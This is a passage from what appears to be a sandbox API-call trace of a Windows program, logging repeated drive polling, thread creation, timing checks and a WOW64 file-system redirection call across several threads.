returned 0x4 [0215.915] Sleep (dwMilliseconds=0x64) [0216.018] GetLogicalDrives () returned 0x4 [0216.018] Sleep (dwMilliseconds=0x64) [0218.036] GetLogicalDrives () returned 0x4 [0218.036] Sleep (dwMilliseconds=0x64) [0218.142] GetLogicalDrives () returned 0x4 [0218.143] Sleep (dwMilliseconds=0x64) [0218.252] GetLogicalDrives () returned 0x4 [0218.252] Sleep (dwMilliseconds=0x64) [0218.361] GetLogicalDrives () returned 0x4 [0218.361] Sleep (dwMilliseconds=0x64) [0219.471] GetLogicalDrives () returned 0x4 [0219.471] Sleep (dwMilliseconds=0x64) [0219.819] GetLogicalDrives () returned 0x4 [0219.819] Sleep (dwMilliseconds=0x64) [0219.928] GetLogicalDrives () returned 0x4 [0219.929] Sleep (dwMilliseconds=0x64) [0220.033] GetLogicalDrives () returned 0x4 [0220.033] Sleep (dwMilliseconds=0x64) [0220.142] GetLogicalDrives () returned 0x4 [0220.142] Sleep (dwMilliseconds=0x64) [0220.256] GetLogicalDrives () returned 0x4 [0220.256] Sleep (dwMilliseconds=0x64) [0220.385] GetLogicalDrives () returned 0x4 [0220.385] Sleep (dwMilliseconds=0x64) [0220.486] GetLogicalDrives () returned 0x4 [0220.486] Sleep (dwMilliseconds=0x64) [0220.596] GetLogicalDrives () returned 0x4 [0220.596] Sleep (dwMilliseconds=0x64) [0220.705] GetLogicalDrives () returned 0x4 [0220.705] Sleep (dwMilliseconds=0x64) [0220.826] GetLogicalDrives () returned 0x4 [0220.826] Sleep (dwMilliseconds=0x64) [0220.939] GetLogicalDrives () returned 0x4 [0220.939] Sleep (dwMilliseconds=0x64) [0221.066] GetLogicalDrives () returned 0x4 [0221.066] Sleep (dwMilliseconds=0x64) [0221.174] GetLogicalDrives () returned 0x4 [0221.174] Sleep (dwMilliseconds=0x64) [0221.283] GetLogicalDrives () returned 0x4 [0221.283] Sleep (dwMilliseconds=0x64) [0221.393] GetLogicalDrives () returned 0x4 [0221.393] Sleep (dwMilliseconds=0x64) [0221.502] GetLogicalDrives () returned 0x4 [0221.502] Sleep (dwMilliseconds=0x64) [0221.611] GetLogicalDrives () returned 0x4 [0221.611] Sleep (dwMilliseconds=0x64) [0221.721] GetLogicalDrives () returned 0x4 [0221.721] Sleep (dwMilliseconds=0x64) [0221.830] GetLogicalDrives () returned 0x4 [0221.830] Sleep (dwMilliseconds=0x64) [0221.939] GetLogicalDrives () returned 0x4 [0221.939] Sleep (dwMilliseconds=0x64) [0222.072] GetLogicalDrives () returned 0x4 [0222.072] Sleep (dwMilliseconds=0x64) [0222.174] GetLogicalDrives () returned 0x4 [0222.174] Sleep (dwMilliseconds=0x64) [0222.283] GetLogicalDrives () returned 0x4 [0222.283] Sleep (dwMilliseconds=0x64) [0222.393] GetLogicalDrives () returned 0x4 [0222.393] Sleep (dwMilliseconds=0x64) [0222.502] GetLogicalDrives () returned 0x4 [0222.502] Sleep (dwMilliseconds=0x64) [0222.616] GetLogicalDrives () returned 0x4 [0222.617] Sleep (dwMilliseconds=0x64) [0222.721] GetLogicalDrives () returned 0x4 [0222.721] Sleep (dwMilliseconds=0x64) [0222.847] GetLogicalDrives () returned 0x4 [0222.848] Sleep (dwMilliseconds=0x64) [0222.955] GetLogicalDrives () returned 0x4 [0222.955] Sleep (dwMilliseconds=0x64) [0223.064] GetLogicalDrives () returned 0x4 [0223.064] Sleep (dwMilliseconds=0x64) [0223.174] GetLogicalDrives () returned 0x4 [0223.175] Sleep (dwMilliseconds=0x64) [0223.283] GetLogicalDrives () returned 0x4 [0223.283] Sleep (dwMilliseconds=0x64) [0223.408] GetLogicalDrives () returned 0x4 [0223.409] Sleep (dwMilliseconds=0x64) [0223.517] GetLogicalDrives () returned 0x4 [0223.517] Sleep (dwMilliseconds=0x64) [0223.627] GetLogicalDrives () returned 0x4 [0223.627] Sleep (dwMilliseconds=0x64) [0223.736] GetLogicalDrives () returned 0x4 [0223.736] Sleep (dwMilliseconds=0x64) [0223.899] GetLogicalDrives () returned 0x4 [0223.899] Sleep (dwMilliseconds=0x64) [0224.017] GetLogicalDrives () returned 0x4 [0224.017] Sleep (dwMilliseconds=0x64) [0224.127] GetLogicalDrives () returned 0x4 [0224.127] Sleep (dwMilliseconds=0x64) [0224.236] GetLogicalDrives () returned 0x4 [0224.236] Sleep (dwMilliseconds=0x64) [0224.346] GetLogicalDrives () returned 0x4 [0224.346] Sleep (dwMilliseconds=0x64) [0224.455] GetLogicalDrives () returned 0x4 [0224.455] Sleep (dwMilliseconds=0x64) [0224.564] GetLogicalDrives () returned 0x4 [0224.564] Sleep (dwMilliseconds=0x64) [0224.674] GetLogicalDrives () returned 0x4 [0224.674] Sleep (dwMilliseconds=0x64) [0224.783] GetLogicalDrives () returned 0x4 [0224.783] Sleep (dwMilliseconds=0x64) Thread: id = 11 os_tid = 0x200 [0193.676] GetTickCount () returned 0x2dfb7 [0193.676] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x2369048 [0193.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x2369048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x390 [0193.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x2369048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x394 [0193.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x2369048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x398 [0193.678] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x2369048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x39c [0193.679] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2379460 [0193.679] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2379460, Size=0x20) returned 0x236b878 [0193.679] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2379478 [0193.679] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2379478, Size=0x20) returned 0x236bcd8 [0193.679] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0193.679] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0193.679] Wow64DisableWow64FsRedirection (in: OldValue=0x2c5ff7c | out: OldValue=0x2c5ff7c*=0x0) returned 1 [0193.680] lstrlenW (lpString="kernel32.dll") returned 12 [0193.680] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b878 | out: hHeap=0x5e0000) returned 1 [0193.680] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0193.680] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236bcd8 | out: hHeap=0x5e0000) returned 1 [0193.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x2345f98, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a0 [0193.680] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0195.052] GetTickCount () returned 0x2e526 [0195.052] GetTickCount () returned 0x2e526 [0195.052] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0195.506] GetTickCount () returned 0x2e6eb [0195.506] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0195.861] GetTickCount () returned 0x2e843 [0195.861] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0195.975] GetTickCount () returned 0x2e8c0 [0195.975] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0196.473] GetTickCount () returned 0x2eaa4 [0196.473] GetTickCount () returned 0x2eaa4 [0196.473] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0197.075] GetTickCount () returned 0x2ed06 [0197.075] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0197.651] GetTickCount () returned 0x2ef38 [0197.651] GetTickCount () returned 0x2ef38 [0197.651] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0198.172] GetTickCount () returned 0x2f14b [0198.172] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0198.655] GetTickCount () returned 0x2f330 [0198.655] GetTickCount () returned 0x2f330 [0198.655] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0199.077] GetTickCount () returned 0x2f4d6 [0199.077] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0199.595] GetTickCount () returned 0x2f6d9 [0199.595] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0200.006] GetTickCount () returned 0x2f86f [0200.006] GetTickCount () returned 0x2f86f [0200.006] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0201.516] GetTickCount () returned 0x2fe5b [0201.516] GetTickCount () returned 0x2fe5b [0201.516] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0201.833] GetTickCount () returned 0x2ff94 [0201.833] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0203.156] GetTickCount () returned 0x304c4 [0203.156] GetTickCount () returned 0x304c4 [0203.156] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0203.335] GetTickCount () returned 0x30570 [0203.335] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0203.432] GetTickCount () returned 0x305dd [0203.432] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0203.548] GetTickCount () returned 0x3064a [0203.548] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0203.750] GetTickCount () returned 0x30715 [0203.750] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0204.227] GetTickCount () returned 0x308ea [0204.227] GetTickCount () returned 0x308ea [0204.227] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0204.532] GetTickCount () returned 0x30a23 [0204.532] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0205.007] GetTickCount () returned 0x30c07 [0205.007] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0205.303] GetTickCount () returned 0x30d30 [0205.303] GetTickCount () returned 0x30d30 [0205.303] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0205.775] GetTickCount () returned 0x30f05 [0205.775] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0206.052] GetTickCount () returned 0x3101e [0206.052] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0206.280] GetTickCount () returned 0x310f9 [0206.280] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0206.393] GetTickCount () returned 0x31166 [0206.393] GetTickCount () returned 0x31166 [0206.393] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0207.040] GetTickCount () returned 0x313f6 [0207.040] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0207.387] GetTickCount () returned 0x3154e [0207.387] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0207.694] GetTickCount () returned 0x31677 [0207.694] GetTickCount () returned 0x31677 [0207.694] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0208.519] GetTickCount () returned 0x319b3 [0208.519] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0208.881] GetTickCount () returned 0x31b1a [0208.881] GetTickCount () returned 0x31b1a [0208.881] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0208.985] GetTickCount () returned 0x31b88 [0208.985] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0209.087] GetTickCount () returned 0x31bf5 [0209.087] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0209.197] GetTickCount () returned 0x31c63 [0209.197] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0209.305] GetTickCount () returned 0x31cd0 [0209.305] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0209.450] GetTickCount () returned 0x31d5d [0209.450] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0209.806] GetTickCount () returned 0x31ec4 [0209.806] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0209.949] GetTickCount () returned 0x31f51 [0209.949] GetTickCount () returned 0x31f51 [0209.949] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0210.083] GetTickCount () returned 0x31fce [0210.083] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0210.182] GetTickCount () returned 0x3203b [0210.182] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0210.291] GetTickCount () returned 0x320a8 [0210.291] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0210.450] GetTickCount () returned 0x32145 [0210.450] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0210.557] GetTickCount () returned 0x321b2 [0210.557] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0210.904] GetTickCount () returned 0x3230a [0210.904] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.010] GetTickCount () returned 0x32377 [0211.010] GetTickCount () returned 0x32377 [0211.010] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.128] GetTickCount () returned 0x323e4 [0211.128] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.230] GetTickCount () returned 0x32452 [0211.230] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.338] GetTickCount () returned 0x324bf [0211.338] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.447] GetTickCount () returned 0x3252d [0211.447] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.557] GetTickCount () returned 0x3259a [0211.557] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.666] GetTickCount () returned 0x32607 [0211.666] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.777] GetTickCount () returned 0x32675 [0211.777] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.885] GetTickCount () returned 0x326e2 [0211.885] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0211.994] GetTickCount () returned 0x3274f [0211.994] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0212.105] GetTickCount () returned 0x327bd [0212.105] GetTickCount () returned 0x327bd [0212.105] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0212.229] GetTickCount () returned 0x3283a [0212.229] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0212.338] GetTickCount () returned 0x328a7 [0212.338] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0214.677] GetTickCount () returned 0x331bf [0214.677] GetTickCount () returned 0x331bf [0214.677] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0214.968] GetTickCount () returned 0x332e8 [0214.968] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0215.317] GetTickCount () returned 0x33440 [0215.317] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0215.416] GetTickCount () returned 0x334ad [0215.416] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0215.541] GetTickCount () returned 0x3352a [0215.541] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0215.656] GetTickCount () returned 0x33598 [0215.656] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0215.760] GetTickCount () returned 0x33605 [0215.760] GetTickCount () returned 0x33605 [0215.760] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0215.915] GetTickCount () returned 0x33692 [0215.915] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0216.002] GetTickCount () returned 0x336ef [0216.002] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0218.036] GetTickCount () returned 0x33edf [0218.036] GetTickCount () returned 0x33edf [0218.036] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0218.142] GetTickCount () returned 0x33f4c [0218.142] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0218.252] GetTickCount () returned 0x33fb9 [0218.252] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0218.361] GetTickCount () returned 0x34027 [0218.361] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0219.471] GetTickCount () returned 0x3447c [0219.471] GetTickCount () returned 0x3447c [0219.471] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0219.819] GetTickCount () returned 0x345d4 [0219.819] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0219.929] GetTickCount () returned 0x34641 [0219.929] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.033] GetTickCount () returned 0x346af [0220.033] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.143] GetTickCount () returned 0x3471c [0220.143] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.256] GetTickCount () returned 0x34789 [0220.256] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.385] GetTickCount () returned 0x34806 [0220.385] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.486] GetTickCount () returned 0x34874 [0220.486] GetTickCount () returned 0x34874 [0220.486] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.596] GetTickCount () returned 0x348e1 [0220.596] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.705] GetTickCount () returned 0x3494f [0220.705] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.826] GetTickCount () returned 0x349bc [0220.826] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0220.924] GetTickCount () returned 0x34a29 [0220.924] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.066] GetTickCount () returned 0x34ab6 [0221.066] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.174] GetTickCount () returned 0x34b23 [0221.174] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.283] GetTickCount () returned 0x34b91 [0221.283] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.393] GetTickCount () returned 0x34bfe [0221.393] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.502] GetTickCount () returned 0x34c6b [0221.502] GetTickCount () returned 0x34c6b [0221.502] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.611] GetTickCount () returned 0x34cd9 [0221.611] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.721] GetTickCount () returned 0x34d46 [0221.721] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.830] GetTickCount () returned 0x34db4 [0221.830] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0221.940] GetTickCount () returned 0x34e21 [0221.940] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.072] GetTickCount () returned 0x34e9e [0222.072] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.174] GetTickCount () returned 0x34f0b [0222.174] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.283] GetTickCount () returned 0x34f79 [0222.283] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.393] GetTickCount () returned 0x34fe6 [0222.393] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.502] GetTickCount () returned 0x35053 [0222.502] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.617] GetTickCount () returned 0x350c1 [0222.617] GetTickCount () returned 0x350c1 [0222.617] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.721] GetTickCount () returned 0x3512e [0222.721] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.848] GetTickCount () returned 0x351bb [0222.848] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0222.955] GetTickCount () returned 0x35219 [0222.956] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0223.065] GetTickCount () returned 0x35286 [0223.065] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0223.175] GetTickCount () returned 0x352f3 [0223.175] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0223.283] GetTickCount () returned 0x35361 [0223.283] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0223.409] GetTickCount () returned 0x353de [0223.409] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0223.518] GetTickCount () returned 0x3544b [0223.518] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0223.627] GetTickCount () returned 0x354b8 [0223.627] GetTickCount () returned 0x354b8 [0223.627] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0223.737] GetTickCount () returned 0x35526 [0223.737] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0223.900] GetTickCount () returned 0x355c2 [0223.900] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0224.017] GetTickCount () returned 0x3563f [0224.017] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0224.127] GetTickCount () returned 0x356ac [0224.127] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0224.236] GetTickCount () returned 0x3571a [0224.236] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0224.346] GetTickCount () returned 0x35787 [0224.346] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0224.455] GetTickCount () returned 0x357f5 [0224.455] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0224.565] GetTickCount () returned 0x35862 [0224.565] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0224.674] GetTickCount () returned 0x358cf [0224.674] GetTickCount () returned 0x358cf [0224.674] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) returned 0x102 [0224.783] GetTickCount () returned 0x3593d [0224.783] WaitForSingleObject (hHandle=0x3a0, dwMilliseconds=0x64) Thread: id = 12 os_tid = 0x8e8 [0193.672] GetTickCount () returned 0x2dfb7 [0193.672] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x23696a8 [0193.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x23696a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x37c [0193.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x23696a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x380 [0193.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x23696a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0193.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x23696a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x388 [0193.674] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2379460 [0193.674] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2379460, Size=0x20) returned 0x236b878 [0193.674] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2379478 [0193.674] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2379478, Size=0x20) returned 0x236bcd8 [0193.675] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0193.675] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0193.675] Wow64DisableWow64FsRedirection (in: OldValue=0x2d9ff7c | out: OldValue=0x2d9ff7c*=0x0) returned 1 [0193.675] lstrlenW (lpString="kernel32.dll") returned 12 [0193.675] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236b878 | out: hHeap=0x5e0000) returned 1 [0193.675] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0193.675] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x236bcd8 | out: hHeap=0x5e0000) returned 1 [0193.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x2357fc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0193.676] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0195.052] GetTickCount () returned 0x2e526 [0195.052] GetTickCount () returned 0x2e526 [0195.052] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0195.507] GetTickCount () returned 0x2e6eb [0195.507] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0195.861] GetTickCount () returned 0x2e843 [0195.861] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0195.975] GetTickCount () returned 0x2e8c0 [0195.975] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0196.473] GetTickCount () returned 0x2eaa4 [0196.473] GetTickCount () returned 0x2eaa4 [0196.473] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0197.075] GetTickCount () returned 0x2ed06 [0197.075] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0197.650] GetTickCount () returned 0x2ef38 [0197.650] GetTickCount () returned 0x2ef38 [0197.650] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0198.172] GetTickCount () returned 0x2f14b [0198.172] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0198.655] GetTickCount () returned 0x2f330 [0198.655] GetTickCount () returned 0x2f330 [0198.655] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0199.075] GetTickCount () returned 0x2f4d6 [0199.077] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0199.595] GetTickCount () returned 0x2f6d9 [0199.595] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0200.006] GetTickCount () returned 0x2f86f [0200.006] GetTickCount () returned 0x2f86f [0200.006] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0201.516] GetTickCount () returned 0x2fe5b [0201.516] GetTickCount () returned 0x2fe5b [0201.516] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0201.833] GetTickCount () returned 0x2ff94 [0201.833] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0203.156] GetTickCount () returned 0x304c4 [0203.156] GetTickCount () returned 0x304c4 [0203.156] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0203.335] GetTickCount () returned 0x30570 [0203.335] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0203.432] GetTickCount () returned 0x305dd [0203.432] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 [0203.548] GetTickCount () returned 0x3064a [0203.548] WaitForSingleObject (hHandle=0x38c, dwMilliseconds=0x64) returned 0x102 